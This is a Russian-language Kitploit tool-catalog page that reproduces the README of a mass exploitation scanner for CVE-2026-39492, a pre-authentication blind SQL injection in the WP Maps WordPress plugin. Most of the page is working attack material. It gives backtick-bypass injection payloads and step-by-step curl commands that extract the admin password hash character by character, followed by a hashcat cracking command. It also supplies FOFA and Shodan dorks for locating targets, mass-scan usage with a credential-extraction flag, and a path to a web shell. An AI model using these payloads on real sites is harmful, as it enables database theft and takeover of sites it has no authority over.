Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39492 — CVE-2026-39492 — WP Maps (wp-google-map-plugin) <= 4.9.1 Массовый сканер неаутентифицированной слепой SQL-инъекции | обнаружение в стиле sqlmap | обход esc_sql() через обратные кавычки | 100K+ установок | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-39492
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubshinthink/cve-2026-39492

CVE-2026-39492

CVE-2026-39492 — WP Maps (wp-google-map-plugin) <= 4.9.1 Массовый сканер неаутентифицированной слепой SQL-инъекции | обнаружение в стиле sqlmap | обход esc_sql() через обратные кавычки | 100K+ установок

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-39492 — Сканер слепой SQL-инъекции WP Maps

Слепая time-based SQLi без аутентификации через обход с обратными кавычками → извлечение БД


Обзор

CVE-2026-39492 — критическая (CVSS 9.3) слепая SQL-инъекция без аутентификации в плагине WP Maps (wp-google-map-plugin) версий ≤ 4.9.1.

AJAX-обработчик wpgmp_ajax_call регистрируется через wp_ajax_nopriv_ для доступа без аутентификации. Параметр location_id передаётся через FlipperCode_Model_Base::is_column() — функцию, которая ошибочно принимает ввод, обёрнутый в обратные кавычки, за доверенный идентификатор SQL-столбца, полностью обходя санитизацию WordPress esc_sql().

Затронутые версии

Версия WP MapsСтатус
≤ 4.9.1Уязвима
≥ 4.9.2Исправлена

Активных установок: 100 000+


Механизм уязвимости

Первопричина

В слое абстракции базы данных плагина функция is_column() проверяет, обёрнут ли пользовательский ввод в обратные кавычки:

root@kitploit:~
// Vulnerable: backtick-wrapped input treated as trusted column identifier
function is_column($value) {
    if (preg_match('/^`.*`$/', $value)) {
        return true;  // bypasses esc_sql() entirely!
    }
    return false;
}

Когда is_column() возвращает true, ввод передаётся напрямую в SQL-запрос без экранирования esc_sql(). Это позволяет:

root@kitploit:~
location_id=`1` AND SLEEP(5) AND `1`=`1

Схема атаки

root@kitploit:~
1. Detect WP Maps via readme.txt → extract version
2. POST to /wp-admin/admin-ajax.php?action=wpgmp_ajax_call
3. Inject backtick-wrapped payload in location_id parameter
4. Measure response time — SLEEP(N) confirms SQL injection
5. Extract data via boolean/time-based blind technique

Почему CVSS 9.3


Установка

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-39492.git
cd CVE-2026-39492
pip install -r requirements.txt

Использование

root@kitploit:~
# Single target detection
python cve_2026_39492.py -t target.com

# Mass scan
python cve_2026_39492.py -f targets.txt

# Mass scan + save results
python cve_2026_39492.py -f targets.txt -o sqli.txt

# Single target with credential extraction
python cve_2026_39492.py -t target.com --extract -v

# Verbose output
python cve_2026_39492.py -t target.com -v

Аргументы

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save vulnerable targets to file
  --threads         Concurrent workers (default: 20)
  --extract         Extract admin credentials from confirmed targets
  -v, --verbose     Show detailed output

Доказательство концепции

Одиночная цель

root@kitploit:~
$ python cve_2026_39492.py -t target.com -v
root@kitploit:~
  CVE-2026-39492 — WP Maps Blind SQL Injection Scanner
  CVSS 9.3 | Pre-Auth | wpgmp_ajax_call → Backtick Bypass

  Target: WP Maps (wp-google-map-plugin) <= 4.9.1
  Vector: admin-ajax.php?action=wpgmp_ajax_call → location_id
  Bypass: backtick-wrapped input bypasses esc_sql()

    [+] WP Maps detected: v4.9.0
    [*] SQLi test: 6.2s (threshold: 5s)
    [+] Blind SQLi CONFIRMED (response: 6.2s)

  Host        : target.com
  WP Maps     : YES v4.9.0
  SQLi        : YES
  Resp time   : 6.2s
  Time        : 7.1s

С извлечением учётных данных

root@kitploit:~
$ python cve_2026_39492.py -t target.com --extract -v
root@kitploit:~
    [+] Blind SQLi CONFIRMED (response: 5.8s)
    [*] Extracting admin credentials via blind SQLi...
    [*] Extracting: admin_user
    [*] Extracting: $P$BqVg...

  Admin User  : admin_user
  Admin Hash  : $P$BqVg7xX...

Массовое сканирование

root@kitploit:~
  CVE-2026-39492  WP Maps Blind SQLi Scanner
  Targets: 2500 | Threads: 20
  Vector: wpgmp_ajax_call → location_id backtick bypass
  ───────────────────────────────────────────────────────

  [SQLi]    target-vuln.com                                 6.2s  v4.9.0       resp:6.2s
  [SQLi]    wp-maps-site.com                                5.8s  v4.8.5       resp:5.8s
  [500/2500] 20%  |  WP Maps:47  SQLi:12  |  current-target.com

  ───────────────────────────────────────────────────────
  Scan complete  |  Time: 320s
  ───────────────────────────────────────────────────────
  Targets        : 2500
  WP Maps found  : 47
  SQLi confirmed : 12

Ручная эксплуатация

Шаг 1 — Определение плагина

root@kitploit:~
curl -sk 'https://target.com/wp-content/plugins/wp-google-map-plugin/readme.txt' | head -5

Шаг 2 — Проверка SQLi с помощью SLEEP

root@kitploit:~
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND SLEEP(5) AND `1`=`1'

# Response > 5 seconds → VULNERABLE

Шаг 3 — Извлечение хеша администратора через слепую SQLi

root@kitploit:~
# Check first character of admin hash
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(3),0) AND `1`=`1'

# Response > 3 seconds → first char is ASCII 36 = '$'

Шаг 4 — Взлом хеша и вход → полный RCE

root@kitploit:~
hashcat -m 400 -a 0 admin_hash.txt /usr/share/wordlists/rockyou.txt

FOFA Dork

root@kitploit:~
body="wp-google-map-plugin"

Shodan

root@kitploit:~
http.html:"wp-google-map-plugin"

Воздействие

Успешная эксплуатация позволяет извлечь всю базу данных WordPress:

  • Хеши паролей администратора → взлом → вход администратора → загрузка плагина → RCE
  • Персональные данные пользователей (PII), адреса электронной почты, токены сессий
  • API-ключи, хранящиеся в wp_options
  • При наличии привилегии MySQL FILE: SELECT ... INTO OUTFILE → веб-шелл → прямой RCE

Отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ЦЕЛЕЙ ТЕСТИРОВАНИЯ.

Данное программное обеспечение предназначено для специалистов по безопасности, проводящих авторизованные тесты на проникновение, организаций, проверяющих собственную инфраструктуру, и исследователей, изучающих эксплуатацию уязвимостей.

Несанкционированный доступ к компьютерным системам является незаконным и может нарушать:

  • США: Закон о компьютерном мошенничестве и злоупотреблениях (18 U.S.C. 1030)
  • Индонезия: UU ITE, статьи 30 и 46
  • Европейский союз: Директива 2013/40/EU
  • Великобритания: Закон о неправомерном использовании компьютеров 1990 года

Авторы не несут ответственности за неправомерное использование.


Ссылки


Этот проект не связан с Flipper Code или WP Maps.

Скачать инструмент
МетрикаЗначение
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииНе требуются
Взаимодействие с пользователемНе требуется
Область воздействияИзменена (затрагивает всю БД)
КонфиденциальностьВысокая
ЦелостностьОтсутствует
ДоступностьНизкая
РесурсСсылка
Бюллетень IONIXionix.io/threat-center/cve-2026-39492
Бюллетень WPScanwpscan.com/vulnerability/c1f19d2e
Бюллетень Wordfencewordfence.com
Запись NVDCVE-2026-39492
Trac плагинаwp-google-map-plugin